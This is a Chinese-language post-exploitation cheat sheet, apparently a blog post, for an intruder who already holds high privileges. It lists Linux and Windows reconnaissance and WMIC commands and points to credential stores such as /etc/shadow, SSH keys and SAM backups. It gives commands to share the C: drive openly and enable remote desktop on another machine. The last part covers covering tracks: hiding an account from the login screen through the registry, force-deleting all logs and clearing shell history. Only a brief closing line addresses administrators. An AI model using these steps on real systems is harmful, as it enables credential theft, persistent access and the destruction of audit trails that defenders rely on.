前言
得到高权限的用户后
我们需要进行有用信息的收集
并尽可能隐藏痕迹
1、linux中的重要信息
Linux中的重要信息如下:
/etc/resolv.conf #DNS配置
/etc/passwd #用户账号
/etc/shadow #用户密码
whoami #当前用户
who –a #当前所有用户
ifconfig -a #网络信息
iptables -L -n #防火墙
netstat –rn #当前系统的网关和路由
uname –a #系统版本
ps aux #所有进程
dpkg -l | head #所有安装好的软件包2、Windows中的重要信息
Windows中的重要信息如下:
ipconfig /all #所有网络参数
ipconfig /displaydns #DNS缓存
netstat -bnao #
netstat –r #当前系统的网关和路由
net view /domain #查共享信息
net user /domain #查域信息
net user %username% /domain # 查域信息
net accounts, net share #查看共享
net group "Domain Controllers" /domain #域环境下的机器可以查看Domain Controllers组里的账号
net share name$=C:\ /unlimited # 把 C盘无限制共享出来
net user username /active:yes /domain # 域管理员重新启动被锁定账号3、WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)
这是windows中很好的一个工具
C:\Users\John>wmic
wmic:root\cli>/?
[global switches] <command>有效的全局开关有:
/NAMESPACE 别名使用的名称空间路径。
/ROLE 包含此别名定义的角色路径。
/NODE 别名使用的服务器。
/IMPLEVEL 客户模拟级别。
/AUTHLEVEL 客户身份验证级别。
/LOCALE 客户应用的语言识别符。
/PRIVILEGES 启用或禁用所有特权。
/TRACE 将调试信息输出到 stderr。
/RECORD 将所有输入命令和输出写入日志。
/INTERACTIVE 设置或重设交互模式。
/FAILFAST 设置或重置 FailFast 模式。
/USER 会话期间使用的用户。
/PASSWORD 用于会话登录的密码。
/OUTPUT 为输出重新定向指定模式。
/APPEND 为输出重新定向指定模式。
/AGGREGATE 设置或重置集合模式。
/AUTHORITY Specifies the <authority type> for the connection.
/?[:<BRIEF|FULL>] 用法信息。一些有用的指令
wmic nicconfig get ipaddress,macaddress #读取IP,MAC地址
wmic computersystem get username #查看登录账号
wmic netlogin get name,lastlogon #查看登录记录
wmic process get caption, executablepath,commandline #提取软件安装信息
wmic process where name=“calc.exe" call terminate #结束进程
wmic os get name,servicepackmajorversion #提取操作系统的补丁版本
wmic product get name,version #提取软件信息
wmic product where name=“name” call uninstall /nointeractive #静默删除
wmic share get /ALL #提取共享文件夹
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1" #开远程桌面
wmic nteventlog get path,filename, writeable #查看日志目录例:
C:\>wmic nteventlog get path,filename, writeable
FileName Path Writeable
appevent \windows\system32\config\ TRUE
ntds \windows\system32\config\ TRUE
dnsevent \windows\system32\config\ TRUE
ntfrs \windows\system32\config\ TRUE
secevent \windows\system32\config\ TRUE
sysevent \windows\system32\config\ TRUE
ThinPrint \windows\system32\config\ TRUE4、一些敏感信息
主要是:
- 商业信息
- 系统信息
Linux值得关注的:
/etc #很多应用程序的配置文件
/usr/local/etc #同样会有应用程序的配置文件
/etc/passwd #用户
/etc/shadow #密码
.ssh
.gnupg #公私钥
The e-mail and data files
业务数据库
身份认证服务器数据库
/tmpwindows值得关注的:
SAM 数据库 #账号
注册表文件
%SYSTEMROOT%\repair\SAM #修复操作时存的SAM的副本
%SYSTEMROOT%\System32\config\RegBack\SAM #SAM的备份
业务数据库
身份认证数据库
临时文件目录
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\5、隐藏痕迹
不能让我们的用户账号在登录界面显示
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersio\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0 #修改注册表,uname位置写想隐藏的账号日志清理
del %WINDIR%\*.log /a/s/q/f #强制静默删除各种日志
history -c #清除命令记录
#一些重要日志
auth.log
secure
btmp
wtmp
lastlog
faillog
其他日志和 HIDS 等结语
收集信息是攻击者的目的
隐藏信息是攻击者必须做的
这都需要注意
作为管理员
则要时刻注意各种日志信息的异常
以及一些敏感信息的安全
